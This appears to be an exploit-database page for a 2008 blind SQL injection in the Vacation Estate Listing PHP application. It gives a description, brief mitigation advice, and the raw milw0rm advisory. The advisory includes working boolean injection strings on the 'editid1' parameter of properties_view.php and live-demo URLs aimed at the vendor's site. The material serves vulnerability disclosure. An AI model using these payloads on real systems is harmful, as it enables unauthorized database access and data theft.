header-logo
Suggest Exploit
vendor:
Vacation Estate Listing
by:
x0r
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Vacation Estate Listing
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Vacation Estate Listing Blind Sql

The Vacation Estate Listing Blind SQL Injection vulnerability allows an attacker to inject malicious SQL queries into the vulnerable application. This can be done by manipulating the 'editid1' parameter of the 'properties_view.php' page. An attacker can use the substring() function to check the version of the database server. For example, 'properties_view.php?editid1=2 and substring(@@version,1,1)=4' and 'properties_view.php?editid1=2 and substring(@@version,1,1)=5' can be used to check the version of the database server.

Mitigation:

The application should be tested for SQL injection vulnerabilities and any vulnerable parameters should be sanitized. Input validation should be implemented to prevent malicious input from being accepted by the application.
Source

Exploit-DB raw data:

######################################
  Vacation Estate Listing Blind Sql
######################################
Autore: x0r 
Email: andry2000@hotmail.it
Site: http://w00tz0ne.altervista.org/index.php
Cms Demo: http://vacation.mole-group.com/
######################################

Bug in \properties_view.php

Exploit: properties_view.php?editid1=2 and substring(@@version,1,1)=4 
         properties_view.php?editid1=2 and substring(@@version,1,1)=5
		 
# Sono solo esempi ovviamente ^ ^

Live Demo:
http://vacation.mole-group.com/properties_view.php?editid1=2%20and%20substring(@@version,1,1)=4
/ No Error /
          
http://vacation.mole-group.com/properties_view.php?editid1=2%20and%20substring(@@version,1,1)=5
/ Errors in the bottom of the page/
		   
Greets: Children Of Ghaza....And My Sweety Girl <3

# milw0rm.com [2008-12-30]